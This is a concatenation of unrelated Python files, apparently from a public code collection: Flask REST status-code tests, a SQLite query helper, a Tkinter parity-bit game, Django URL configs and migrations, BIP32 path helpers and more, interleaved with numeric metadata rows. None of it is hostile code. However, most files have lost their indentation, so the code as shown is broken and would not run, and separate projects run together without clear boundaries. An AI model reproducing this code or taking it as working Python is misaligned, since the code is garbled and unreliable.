    # TODO: Only implement MethodView methods for defined Resource methods. Only then
    # can we test that all methods return 405 (and not just the ones this library
    # didn't define in its MethodViews).
    # NOTE: For now we just test the methods that this library
    # didn't define in its MethodViews.

    # List-level
    response = client.put("/custom/")
    assert response.status_code == 405

    response = client.delete("/custom/")
    assert response.status_code == 405

    # Item-level
    response = client.post("/custom/1")
    assert response.status_code == 405


def test_406_if_route_method_but_unsupported_accept(client):
    # NOTE: By default we don't accept any mimetype at all
    headers = {"accept": "application/marcxml+garbage"}

    # List-level
    response = client.get("/custom/", headers=headers)
    assert response.status_code == 406

    response = client.post("/custom/", headers=headers)
    assert response.status_code == 406

    # Item-level
    response = client.get("/custom/1", headers=headers)
    assert response.status_code == 406

    response = client.put("/custom/1", headers=headers)
    assert response.status_code == 406

    response = client.patch("/custom/1", headers=headers)
    assert response.status_code == 406

    response = client.delete("/custom/1", headers=headers)
    assert response.status_code == 406


def test_415_if_route_method_accept_but_unsupported_content_type(client):
    # NOTE: Right now, we rely entirely on headers for payload assessment.
    headers = {"accept": "application/json", "content-type": "application/json+garbage"}

    # NOTE: We only test methods that accept a payload
    # List-level
    response = client.post("/custom/", headers=headers)
    assert response.status_code == 415

    # Item-level
    response = client.put("/custom/1", headers=headers)
    assert response.status_code == 415

    response = client.patch("/custom/1", headers=headers)
    assert response.status_code == 415

# ---- sql.py (saidul-islam-tuhin/Computer-Assistant-With-Bilingual-Voice-Commands, MIT) ----
# -*- coding: utf-8 -*-
import sqlite3 as lite
import logging
import sys
from collections import OrderedDict
import conf
LOG_FORMAT = "%(levelname)s > Line:%(lineno)s - %(message)s"
logging.basicConfig(filename="debug.log",
level=logging.DEBUG,
format=LOG_FORMAT,
filemode="w",
)
logger = logging.getLogger(__name__)
# encode: string -> byte
# unicode.encode() -> bytes
# decode: bytes -> string
# bytes.decode() -> unicode
# no need to encode or decode
def decode_to_text(text):
if isinstance(text, str):
print(text)
if "সময়" == text:
logger.debug(str(text.encode('utf-8')))
logger.debug(str("সময়".encode('utf-8')))
logger.debug(str("সময়".encode('utf-8')))
# decode_text = text.encode('utf-8').decode('utf-8')
decode_text = text
else:
decode_text = text
return decode_text
def convert_into_dic(columns, rows):
"""
    Return the query result as an ordered dictionary (column name -> list of row values)
:type columns: list
:type rows: tuple
"""
column_name = None
row_val = None
query_val = OrderedDict()
length_c = len(columns)
for c in range(0,length_c):
column_name = columns[c]
query_val[column_name] = [] # create key name with empty list value
for r in range(0,len(rows)):
row_val = decode_to_text(rows[r][c])
query_val[column_name].append(row_val)
return query_val
def run_query(query):
"""
    Run the given query and return its result
    query: raw SQL string
"""
con = None
data = None
try:
con = lite.connect('VoiceCommand.db')
cur = con.cursor()
cur.execute(query)
        if any(keyword in query.lower() for keyword in ('update', 'insert', 'delete')):
conf.NEW_COMMAND = True
data = cur.fetchall()
print(data)
if cur.description:
column_name = [c[0] for c in cur.description]
if data:
data = convert_into_dic(column_name, data)
con.commit()
except lite.Error as e:
print("Error {}:".format(e.args[0]))
sys.exit(1)
finally:
if con:
con.close()
return data
# Chapter 06/code/prime.py (shivampotdar/Artificial-Intelligence-with-Python, MIT license)
import itertools as it
import logpy.core as lc
from sympy.ntheory.generate import prime, isprime
# Check if the elements of x are prime
def check_prime(x):
if lc.isvar(x):
return lc.condeseq([(lc.eq, x, p)] for p in map(prime, it.count(1)))
else:
return lc.success if isprime(x) else lc.fail
# Declare the variable
x = lc.var()
# Check if an element in the list is a prime number
list_nums = (23, 4, 27, 17, 13, 10, 21, 29, 3, 32, 11, 19)
print('\nList of primes in the list:')
print(set(lc.run(0, x, (lc.membero, x, list_nums), (check_prime, x))))
# Print first 7 prime numbers
print('\nList of first 7 prime numbers:')
print(lc.run(7, x, check_prime(x)))
# vigobusapi/exceptions.py (Lodeiro0001/Python_VigoBusAPI, Apache-2.0 license)
"""EXCEPTIONS
Exceptions used on the project
"""
__all__ = ("VigoBusAPIException", "StopNotExist", "StopNotFound")
class VigoBusAPIException(Exception):
"""Base exception for the project custom exceptions"""
pass
class StopNotExist(VigoBusAPIException):
"""The Stop does not physically exist (as reported by an external trusted API/data source)"""
pass
class StopNotFound(VigoBusAPIException):
"""The Stop was not found on a local data source, but might physically exist"""
pass
# samples/list_unresolved_alerts/list_unresolved_alerts.py (chandrashekar-cohesity/management-sdk-python, Apache-2.0 license)
# Copyright 2019 Cohesity Inc.
#
# Python example to list recent user_configurable unresolved alert unresolved Alerts.
#
# Usage: python list_unresolved_alerts.py --max_alerts 10
import argparse
import datetime
from cohesity_management_sdk.cohesity_client import CohesityClient
from cohesity_management_sdk.models.alert_state_list_enum import AlertStateListEnum
CLUSTER_USERNAME = 'cluster_username'
CLUSTER_PASSWORD = 'cluster_password'
CLUSTER_VIP = 'prod-cluster.cohesity.com'
DOMAIN = 'LOCAL'
MAX_ALERTS = 100
class Alerts(object):
"""
Class to display Alerts.
"""
def display_alerts(self, cohesity_client, max_alerts):
"""
Method to display the list of Unresolved Alerts
:param cohesity_client(object): Cohesity client object.
:return:
"""
alerts = cohesity_client.alerts
alerts_list = alerts.get_alerts(max_alerts=max_alerts,
alert_state_list=AlertStateListEnum.KOPEN)
for alert in alerts_list:
print ('{0:<10}\t\t{1:>8}\t{2:>10}'.format(self.epoch_to_date(alert.first_timestamp_usecs),
alert.alert_category,
alert.severity))
@staticmethod
def epoch_to_date(epoch):
"""
Method to convert epoch time in usec to date format
:param epoch(int): Epoch time of the job run.
:return: date(str): Date format of the job run.
"""
date_string = datetime.datetime.fromtimestamp(epoch/10**6).strftime('%m-%d-%Y %H:%M:%S')
return date_string
def main(args):
# To init client with user/pass.
cohesity_client = CohesityClient(cluster_vip=CLUSTER_VIP,
username=CLUSTER_USERNAME,
password=CLUSTER_PASSWORD,
domain=DOMAIN)
alerts = Alerts()
alerts.display_alerts(cohesity_client, args.max_alerts)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Arguments needed to run this python process.")
parser.add_argument("--max_alerts", help="Number of Alerts.", default=MAX_ALERTS)
args = parser.parse_args()
main(args)
# random_geometry_points_service/app.py (brauls/random-geometry-points-service, MIT license)
"""Entry module that inits the flask app.
"""
from flask import Flask
from .endpoints.api import init_api
def create_app():
"""Create the flask app and initialize the random geometry points api.
Returns:
Flask: The initialized flask app
"""
flask_app = Flask(__name__)
api = init_api()
api.init_app(flask_app)
return flask_app
# apps/users/urls.py (CosmosTUe/Cosmos, MIT license)
from django.contrib.auth import views as auth_views
from django.urls import path
from django.urls.base import reverse_lazy
from django.views.decorators.csrf import csrf_exempt
from . import views, webhooks
from .forms.authorization import CosmosPasswordChangeForm, CosmosPasswordResetForm, CosmosSetPasswordForm
app_name = "cosmos_users"
urlpatterns = [
# auth urls
path("login/", views.CosmosLoginView.as_view(), name="login"),
path("logout/", auth_views.LogoutView.as_view(), name="logout"),
path(
"password_change/",
auth_views.PasswordChangeView.as_view(
form_class=CosmosPasswordChangeForm, success_url=reverse_lazy("cosmos_users:password_change_done")
),
name="password_change",
),
path("password_change/done/", auth_views.PasswordChangeDoneView.as_view(), name="password_change_done"),
path(
"password_reset/",
auth_views.PasswordResetView.as_view(
form_class=CosmosPasswordResetForm, success_url=reverse_lazy("cosmos_users:password_reset_done")
),
name="password_reset",
),
path("password_reset/done/", auth_views.PasswordResetDoneView.as_view(), name="password_reset_done"),
path(
"reset/<uidb64>/<token>/",
auth_views.PasswordResetConfirmView.as_view(
form_class=CosmosSetPasswordForm, success_url=reverse_lazy("cosmos_users:password_reset_complete")
),
name="password_reset_confirm",
),
path("reset/done/", auth_views.PasswordResetCompleteView.as_view(), name="password_reset_complete"),
# custom urls
path("profile/", views.profile, name="user_profile"),
path("delete/", views.delete, name="user_delete"),
path(
"register/",
views.RegistrationWizard.as_view(views.FORMS, condition_dict=views.CONDITION_DICT),
name="user_register",
),
path("register/done/", views.registration_done, name="registration_done"),
path("confirm/<uidb64>/<token>/", views.activate, name="confirm_registration"),
path("hook/", csrf_exempt(webhooks.SendGridWebhook.as_view()), name="email_hook"),
]
# tests/cases.py (bio2bel/antibodyregistry, MIT license)
# -*- coding: utf-8 -*-
"""Test cases for Bio2BEL Antibody Registry."""
from bio2bel.testing import AbstractTemporaryCacheClassMixin
from bio2bel_antibodyregistry import Manager
from tests.constants import TEST_RESULTS_PATH
__all__ = [
'TemporaryCacheClass',
]
class TemporaryCacheClass(AbstractTemporaryCacheClassMixin):
"""A test case containing a temporary database and a Bio2BEL Antibody Registry manager."""
Manager = Manager
manager: Manager
@classmethod
def populate(cls):
"""Populate the Bio2BEL Antibody Registry database with test data."""
cls.manager.populate(url=TEST_RESULTS_PATH)
# selfchecking1.py (JJP-SWFC/Self-Checking-Binary-Code, MIT license)
from tkinter import *
import numpy as np
import random
#generates a random 16 digits
digtexts = np.random.randint(2, size=16)
q1check = 0
q2check = 0
q3check = 0
q4check = 0
q5check = 0
#The function to swap 1s to 0s, it is used as the button command
def flipper0():
#Probably an awful way of swapping a 1 to a 0 but oh well
dig0["text"] = (str(int((not bool(int(dig0["text"]))))))
def flipper1():
dig1["text"] = (str(int((not bool(int(dig1["text"]))))))
def flipper2():
dig2["text"] = (str(int((not bool(int(dig2["text"]))))))
def flipper4():
dig4["text"] = (str(int((not bool(int(dig4["text"]))))))
def flipper8():
dig8["text"] = (str(int((not bool(int(dig8["text"]))))))
def checkAnswer():
global q1check, q2check, q3check, q4check, q5check
#sets the checks to a new variable so I can put them back afterwards
oldq1 = q1check
oldq2 = q2check
oldq3 = q3check
oldq4 = q4check
oldq5 = q5check
#Sets each label or button to the default background
dig0["background"] = "SystemButtonFace"
dig1["background"] = "SystemButtonFace"
dig2["background"] = "SystemButtonFace"
dig3["background"] = "SystemButtonFace"
dig4["background"] = "SystemButtonFace"
dig5["background"] = "SystemButtonFace"
dig6["background"] = "SystemButtonFace"
dig7["background"] = "SystemButtonFace"
dig8["background"] = "SystemButtonFace"
dig9["background"] = "SystemButtonFace"
dig10["background"] = "SystemButtonFace"
dig11["background"] = "SystemButtonFace"
dig12["background"] = "SystemButtonFace"
dig13["background"] = "SystemButtonFace"
dig14["background"] = "SystemButtonFace"
dig15["background"] = "SystemButtonFace"
#Gets the text of each of the buttons
selzero = dig0["text"]
selone = dig1["text"]
seltwo = dig2["text"]
selfour = dig4["text"]
seleight = dig8["text"]
#adds the 1s to the total if the selection is a 1
q1check += int(selone)
q2check += int(seltwo)
q3check += int(selfour)
q4check += int(seleight)
q5check += int(selzero) + int(selone) + int(seltwo) + int(selfour) + int(seleight)
if q1check%2 != 0:
print("Check the first selection box")
#Highlights the boxes for this selection
dig1["background"] = "light blue"
dig5["background"] = "light blue"
dig9["background"] = "light blue"
dig13["background"] = "light blue"
dig3["background"] = "light blue"
dig7["background"] = "light blue"
dig11["background"] = "light blue"
dig15["background"] = "light blue"
elif q2check%2 != 0:
print("Check the second selection box")
dig2["background"] = "light blue"
dig6["background"] = "light blue"
dig10["background"] = "light blue"
dig14["background"] = "light blue"
dig3["background"] = "light blue"
dig7["background"] = "light blue"
dig11["background"] = "light blue"
dig15["background"] = "light blue"
elif q3check%2 != 0:
print("Check the third selection box")
dig4["background"] = "light blue"
dig5["background"] = "light blue"
dig6["background"] = "light blue"
dig7["background"] = "light blue"
dig12["background"] = "light blue"
dig13["background"] = "light blue"
dig14["background"] = "light blue"
dig15["background"] = "light blue"
elif q4check%2 != 0:
print("Check the final selection box")
dig8["background"] = "light blue"
dig9["background"] = "light blue"
dig10["background"] = "light blue"
dig11["background"] = "light blue"
dig12["background"] = "light blue"
dig13["background"] = "light blue"
dig14["background"] = "light blue"
dig15["background"] = "light blue"
elif q5check %2 != 0:
print("You have an odd number of 1s")
else:
print("Well done! You got it right!")
#Puts the checks back to their previous state
q1check = oldq1
q2check = oldq2
q3check = oldq3
q4check = oldq4
q5check = oldq5
if __name__ == "__main__":
    #The root tkinter window
gui = Tk()
#Adds the "check answer" button
checkmyanswer = Button(gui, text="Check Answer", command=checkAnswer)
#Add all the buttons and put them in their place "pady" adds vertical space
dig0 = Button(gui, text=digtexts[0], command=flipper0)
dig1 = Button(gui, text=digtexts[1], command=flipper1)
dig2 = Button(gui, text=digtexts[2], command=flipper2)
dig4 = Button(gui, text=digtexts[4], command=flipper4)
dig8 = Button(gui, text=digtexts[8], command=flipper8)
dig0.grid(row=0,column=0,pady=5)
dig1.grid(row=0,column=1)
dig2.grid(row=0,column=2)
dig4.grid(row=1,column=0)
dig8.grid(row=2,column=0,pady=5)
#Make all the rest random, also probably horribly inefficient but it's not a big code so it's fine for now
dig3 = Label(gui, text=digtexts[3])
dig5 = Label(gui, text=digtexts[5])
dig6 = Label(gui, text=digtexts[6])
dig7 = Label(gui, text=digtexts[7])
dig9 = Label(gui, text=digtexts[9])
dig10 = Label(gui, text=digtexts[10])
dig11 = Label(gui, text=digtexts[11])
dig12 = Label(gui, text=digtexts[12])
dig13 = Label(gui, text=digtexts[13])
dig14 = Label(gui, text=digtexts[14])
dig15 = Label(gui, text=digtexts[15])
#Sets all of the positions of each label
dig3.grid(row=0,column=3)
dig5.grid(row=1,column=1)
dig6.grid(row=1,column=2)
dig7.grid(row=1,column=3)
dig9.grid(row=2,column=1)
dig10.grid(row=2,column=2)
dig11.grid(row=2,column=3)
dig12.grid(row=3,column=0)
dig13.grid(row=3,column=1)
dig14.grid(row=3,column=2)
dig15.grid(row=3,column=3)
#Makes sure that "checkanswer" spans across all 4 columns and also has a bit of space from the text
checkmyanswer.grid(row=4, columnspan=4, pady=5)
#Numbers 0 through to 15
for i in range(16):
        #Skips i = 0 and the powers of 2, i.e. the selectable parity positions
        if (not (i & (i-1) == 0)):
#Checks if the last digit is a 1
if (str(format(i,"04b"))[3]) == "1":
if digtexts[i] == 1:
q1check += 1
#Checks if the second to last digit is a 1
if (str(format(i,"04b"))[2]) == "1":
if digtexts[i] == 1:
q2check += 1
#Checks if the third to last digit is a 1
if (str(format(i,"04b"))[1]) == "1":
if digtexts[i] == 1:
q3check += 1
#Checks if the fourth to last digit is a 1
if (str(format(i,"04b"))[0]) == "1":
if digtexts[i] == 1:
q4check += 1
#Just checks all of the 1s that aren't the "selector" ones
if digtexts[i] == 1:
q5check += 1
#Runs the system
gui.mainloop()
#!/usr/bin/python3
# src/clic/initnode.py (NathanRVance/clic, MIT license)
import os
from pathlib import Path
from pwd import getpwnam
from clic import pssh
import configparser
config = configparser.ConfigParser()
config.read('/etc/clic/clic.conf')
user = config['Daemon']['user']
def init(host, cpus, disk, mem, user=user):
# Copy executables in /etc/clic/ to node and run in shell expansion order
paths = [path for path in Path('/etc/clic').iterdir()]
paths.sort()
for path in paths:
if path.is_file() and os.access(str(path), os.X_OK):
dest = '/tmp/{0}'.format(path.parts[-1])
pssh.copy(user, user, host, str(path), dest)
pssh.run(user, user, host, 'sudo {0} {1} {2} {3}'.format(dest, cpus, disk, mem))
def main():
import argparse
import re
    parser = argparse.ArgumentParser(description='Initialize a node for use with clic by configuring its /etc/hosts and nfs. This script is run from the head node.')
from clic import version
parser.add_argument('-v', '--version', action='version', version=version.__version__)
parser.add_argument('userhost', metavar='USER@HOST', nargs=1, help='passwordless ssh exists both ways between USER@localhost and USER@HOST')
args = parser.parse_args()
[user, host] = args.userhost[0].split('@')
init(host, 0, 0, 0, user=user)
# src/text_selection/cover_export.py (stefantaubert/text-selection, MIT license)
from typing import List
from typing import OrderedDict as OrderedDictType
from typing import Set
from ordered_set import OrderedSet
from text_selection.cover_applied import cover_symbols
def cover_symbols_default(data: OrderedDictType[int, List[str]], symbols: Set[str]) -> OrderedSet[int]:
return cover_symbols(
data=data,
symbols=symbols,
)
# helper.py (prachir1501/NeuralDater, Apache-2.0 license)
import numpy as np, sys, unicodedata, requests, os, random, pdb, json, gensim
import matplotlib.pyplot as plt, uuid, time, argparse, pickle, operator
import logging, logging.config, itertools, pathlib
import scipy.sparse as sp
from collections import defaultdict as ddict
from random import randint
from pprint import pprint
from sklearn.metrics import precision_recall_fscore_support
np.set_printoptions(precision=4)
def checkFile(filename):
"""
Check whether file is present or not
Parameters
----------
filename: Path of the file to check
Returns
-------
"""
return pathlib.Path(filename).is_file()
def getEmbeddings(embed_loc, wrd_list, embed_dims):
"""
Gives embedding for each word in wrd_list
Parameters
----------
embed_loc: Path to embedding file
wrd_list: List of words for which embedding is required
embed_dims: Dimension of the embedding
Returns
-------
embed_matrix: (len(wrd_list) x embed_dims) matrix containing embedding for each word in wrd_list in the same order
"""
embed_list = []
model = gensim.models.KeyedVectors.load_word2vec_format(embed_loc, binary=False)
for wrd in wrd_list:
if wrd in model.vocab: embed_list.append(model.word_vec(wrd))
else: embed_list.append(np.random.randn(embed_dims))
return np.array(embed_list, dtype=np.float32)
def set_gpu(gpus):
"""
Sets the GPU to be used for the run
Parameters
----------
gpus: List of GPUs to be used for the run
Returns
-------
"""
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = gpus
def debug_nn(res_list, feed_dict):
"""
Function for debugging Tensorflow model
Parameters
----------
res_list: List of tensors/variables to view
feed_dict: Feed dict required for getting values
Returns
-------
Returns the list of values of given tensors/variables after execution
"""
import tensorflow as tf
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
summ_writer = tf.summary.FileWriter("tf_board/debug_nn", sess.graph)
res = sess.run(res_list, feed_dict = feed_dict)
pdb.set_trace()
def get_logger(name, log_dir, config_dir):
"""
Creates a logger object
Parameters
----------
name: Name of the logger file
log_dir: Directory where logger file needs to be stored
config_dir: Directory from where log_config.json needs to be read
Returns
-------
A logger object which writes to both file and stdout
"""
config_dict = json.load(open( config_dir + 'log_config.json'))
config_dict['handlers']['file_handler']['filename'] = log_dir + name.replace('/', '-')
logging.config.dictConfig(config_dict)
logger = logging.getLogger(name)
std_out_format = '%(asctime)s - [%(levelname)s] - %(message)s'
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logging.Formatter(std_out_format))
logger.addHandler(consoleHandler)
return logger
def partition(inp_list, n):
"""
Paritions a given list into chunks of size n
Parameters
----------
inp_list: List to be splittted
n: Number of equal partitions needed
Returns
-------
Splits inp_list into n equal chunks
"""
division = len(inp_list) / float(n)
return [ inp_list[int(round(division * i)): int(round(division * (i + 1)))] for i in range(n) ]
def getChunks(inp_list, chunk_size):
"""
Splits inp_list into lists of size chunk_size
Parameters
----------
inp_list: List to be splittted
chunk_size: Size of each chunk required
Returns
-------
chunks of the inp_list each of size chunk_size, last one can be smaller (leftout data)
"""
return [inp_list[x:x+chunk_size] for x in range(0, len(inp_list), chunk_size)]
def mergeList(list_of_list):
"""
Merges list of list into a list
Parameters
----------
list_of_list: List of list
Returns
-------
A single list (union of all given lists)
"""
	return list(itertools.chain.from_iterable(list_of_list))
# tests/_test_paramiko.py (weka-io/plumbum, MIT license)
from plumbum.paramiko_machine import ParamikoMachine as PM
from plumbum import local
local.env.path.append("c:\\progra~1\\git\\bin")
from plumbum.cmd import ls, grep
m=PM("192.168.1.143")
mls=m["ls"]
mgrep=m["grep"]
#(mls | mgrep["b"])()
(mls | grep["\\."])()
(ls | mgrep["\\."])()
# tilapia/lib/basic/bip32.py (huazhouwang/tilapia, MIT license)
from typing import List, Optional
BIP32_PRIME = 0x80000000
UINT32_MAX = (1 << 32) - 1
def decode_bip44_path(path: str) -> List[int]:
def _parse_node(node: str) -> Optional[int]:
if not node or node == "m" or node == "M":
return None
is_hardened = node.endswith("'") or node.endswith("h")
node = node[:-1] if is_hardened else node
try:
child_index = int(node)
except ValueError:
child_index = None
if child_index is None:
return None
if is_hardened:
child_index = child_index | BIP32_PRIME
if not (0 <= child_index <= UINT32_MAX):
raise ValueError(f"bip32 path child index out of range: {child_index}")
return child_index
nodes = path.split("/")
nodes = (_parse_node(i) for i in nodes)
nodes = (i for i in nodes if i is not None)
return list(nodes)
def encode_bip32_path(path_as_ints: List[int]) -> str:
nodes = ["m"]
for child_index in path_as_ints:
if not isinstance(child_index, int):
raise TypeError(f"bip32 path child index must be int: {child_index}")
if not (0 <= child_index <= UINT32_MAX):
raise ValueError(f"bip32 path child index out of range: {child_index}")
prime = ""
if child_index & BIP32_PRIME:
prime = "'"
child_index = child_index ^ BIP32_PRIME
node = f"{child_index}{prime}"
nodes.append(node)
return "/".join(nodes)
| 29.25 | 83 | 0.593688 | 208 | 1,521 | 4.153846 | 0.269231 | 0.231481 | 0.052083 | 0.069444 | 0.305556 | 0.25463 | 0.185185 | 0.185185 | 0.185185 | 0.185185 | 0 | 0.037736 | 0.30309 | 1,521 | 51 | 84 | 29.823529 | 0.777358 | 0 | 0 | 0.157895 | 0 | 0 | 0.116371 | 0 | 0 | 0 | 0.006575 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.026316 | 0 | 0.236842 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf4417e992cda896f5b5d7ec9787891875aec0be | 2,070 | py | Python | pitronically/blog/migrations/0002_auto_20190719_1436.py | the16thpythonist/pitronically | 2f680f4e04a59fed7b410a4b8c26240c4efc5159 | [
"MIT"
] | null | null | null | pitronically/blog/migrations/0002_auto_20190719_1436.py | the16thpythonist/pitronically | 2f680f4e04a59fed7b410a4b8c26240c4efc5159 | [
"MIT"
] | null | null | null | pitronically/blog/migrations/0002_auto_20190719_1436.py | the16thpythonist/pitronically | 2f680f4e04a59fed7b410a4b8c26240c4efc5159 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.8 on 2019-07-19 14:36
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import filer.fields.image
import taggit.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('blog', '0001_initial'),
migrations.swappable_dependency(settings.FILER_IMAGE_MODEL),
('taggit', '0003_taggeditem_add_unique_index'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.AddField(
model_name='tutorial',
name='author',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='tutorial',
name='tags',
field=taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags'),
),
migrations.AddField(
model_name='project',
name='author',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='project',
name='tags',
field=taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags'),
),
migrations.AddField(
model_name='project',
name='thumbnail',
field=filer.fields.image.FilerImageField(on_delete=django.db.models.deletion.CASCADE, related_name='project_thumbnail', to=settings.FILER_IMAGE_MODEL),
),
migrations.AddField(
model_name='project',
name='thumbnail_preview',
field=filer.fields.image.FilerImageField(on_delete=django.db.models.deletion.CASCADE, related_name='project_thumbnail_preview', to=settings.FILER_IMAGE_MODEL),
),
]
| 39.056604 | 171 | 0.658937 | 228 | 2,070 | 5.811404 | 0.307018 | 0.036226 | 0.104151 | 0.122264 | 0.700377 | 0.666415 | 0.633962 | 0.582642 | 0.582642 | 0.582642 | 0 | 0.015567 | 0.224155 | 2,070 | 52 | 172 | 39.807692 | 0.809465 | 0.021739 | 0 | 0.577778 | 1 | 0 | 0.153238 | 0.028176 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf4534497c74067b4ddb8a6599a853af99617d7a | 587 | py | Python | rest_slack/app_settings.py | jordaneremieff/django-rest-slack | 18d2662898c6d9408d7cbb573ffdbb5dad1fb1b3 | [
"MIT"
] | 1 | 2020-09-26T18:28:11.000Z | 2020-09-26T18:28:11.000Z | rest_slack/app_settings.py | jordaneremieff/django-rest-slack | 18d2662898c6d9408d7cbb573ffdbb5dad1fb1b3 | [
"MIT"
] | null | null | null | rest_slack/app_settings.py | jordaneremieff/django-rest-slack | 18d2662898c6d9408d7cbb573ffdbb5dad1fb1b3 | [
"MIT"
] | null | null | null | import os
from django.conf import settings
SLACK_CLIENT_ID = getattr(settings, 'SLACK_CLIENT_ID', os.environ.get('SLACK_CLIENT_ID'))
SLACK_CLIENT_SECRET = getattr(settings, 'SLACK_CLIENT_SECRET', os.environ.get('SLACK_CLIENT_SECRET'))
SLACK_VERIFICATION_TOKEN = getattr(settings, 'SLACK_VERIFICATION_TOKEN', os.environ.get('SLACK_VERIFICATION_TOKEN'))
SLACK_BOT_USER_TOKEN = getattr(settings, 'SLACK_BOT_USER_TOKEN', os.environ.get('SLACK_BOT_USER_TOKEN'))
REST_FRAMEWORK = getattr(settings, 'REST_FRAMEWORK', {'EXCEPTION_HANDLER': 'rest_framework.views.exception_handler'})
| 30.894737 | 117 | 0.807496 | 79 | 587 | 5.594937 | 0.278481 | 0.149321 | 0.180995 | 0.153846 | 0.20362 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074957 | 587 | 18 | 118 | 32.611111 | 0.813996 | 0 | 0 | 0 | 0 | 0 | 0.383305 | 0.146508 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf4d33f3d55caacf7fbaa981aaf614ce3ba88ed9 | 435 | py | Python | komax_app/migrations/0002_komax_group_of_square.py | UsernameForGerman/PrettlNKKomax | 8684300852458ab99988a63e49db47d53ff7ddc4 | [
"Apache-2.0"
] | null | null | null | komax_app/migrations/0002_komax_group_of_square.py | UsernameForGerman/PrettlNKKomax | 8684300852458ab99988a63e49db47d53ff7ddc4 | [
"Apache-2.0"
] | 9 | 2021-03-19T14:08:01.000Z | 2022-03-12T00:41:09.000Z | komax_app/migrations/0002_komax_group_of_square.py | UsernameForGerman/PrettlNKKomax | 8684300852458ab99988a63e49db47d53ff7ddc4 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.2.7 on 2020-02-14 10:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('komax_app', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='komax',
name='group_of_square',
field=models.CharField(default='1 2 3', max_length=6),
preserve_default=False,
),
]
| 21.75 | 66 | 0.593103 | 50 | 435 | 5.02 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074675 | 0.291954 | 435 | 19 | 67 | 22.894737 | 0.74026 | 0.103448 | 0 | 0 | 1 | 0 | 0.118557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |